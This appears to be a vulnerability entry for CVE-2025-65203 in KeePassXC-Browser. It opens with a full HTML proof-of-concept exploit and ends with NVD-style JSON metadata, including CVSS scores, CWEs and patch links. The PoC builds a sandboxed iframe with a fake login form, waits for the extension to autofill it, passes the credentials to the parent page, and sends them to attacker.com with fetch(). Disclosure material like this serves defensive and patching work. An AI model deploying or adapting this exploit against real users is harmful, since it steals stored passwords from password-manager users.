CVE-2025-65203

<!-- CVE-2025-65203 PoC: KeePassXC-Browser Credential Theft via Sandboxed iframe --> <!DOCTYPE html> <html> <head> <title>KeePassXC-Browser CSP Bypass PoC</title> <meta http-equiv="Content-Security-Policy" content="frame-src 'self' https://attacker.com; script-src 'unsafe-inline'"> </head> <body> <h1>Legitimate Login Page (Attacker Controlled)</h1> <form action="https://attacker.com/steal"> <input type="text" name="username" id="user"> <input type="password" name="password" id="pass"> <button type="submit">Login</button> </form> <!-- Attacker-controlled sandboxed iframe with fake login form --> <iframe id="sandboxFrame" src="sandbox.html" sandbox="allow-scripts allow-forms"></iframe> <script> // Listen for credentials from the sandboxed iframe window.addEventListener('message', function(event) { if (event.data.type === 'stolen_creds') { console.log('Stolen credentials:', event.data.credentials); // Send to attacker server fetch('https://attacker.com/log?creds=' + JSON.stringify(event.data.credentials)); } }); </script> </body> </html> <!-- sandbox.html (hosted on attacker.com) --> <!-- <!DOCTYPE html> <html> <head> <title>Embedded Form</title> </head> <body> <form id="fakeLogin"> <input type="text" name="username" id="user"> <input type="password" name="password" id="pass"> <button type="submit">Submit</button> </form> <script> // Wait for KeePassXC-Browser to auto-fill setTimeout(() => { const user = document.getElementById('user').value; const pass = document.getElementById('pass').value; if (user && pass) { // Exfiltrate credentials via postMessage window.parent.postMessage({ type: 'stolen_creds', credentials: { username: user, password: pass } }, '*'); } }, 3000); </script> </body> </html> -->

{"cve": {"id": "CVE-2025-65203", "sourceIdentifier": "[email protected]", "published": "2025-12-17T18:15:48.860", "lastModified": "2026-01-05T14:45:41.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KeePassXC-Browser thru 1.9.9.2 autofills or prompts to fill stored credentials into documents rendered under a browser-enforced CSP directive and iframe attribute sandbox, allowing attacker-controlled script in the sandboxed document to access populated form fields and exfiltrate credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-353"}, {"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keepassxc:keepassxc-browser:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.9.2", "matchCriteriaId": "BFE9A6CC-9DA6-4C10-8C1C-42B97F643826"}]}]}], "references": [{"url": "https://github.com/keepassxreboot/keepassxc-browser/issues/2647", "source": "[email protected]", "tags": ["Third Party Advisory", "Issue Tracking"]}, {"url": "https://github.com/keepassxreboot/keepassxc-browser/pull/2648", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}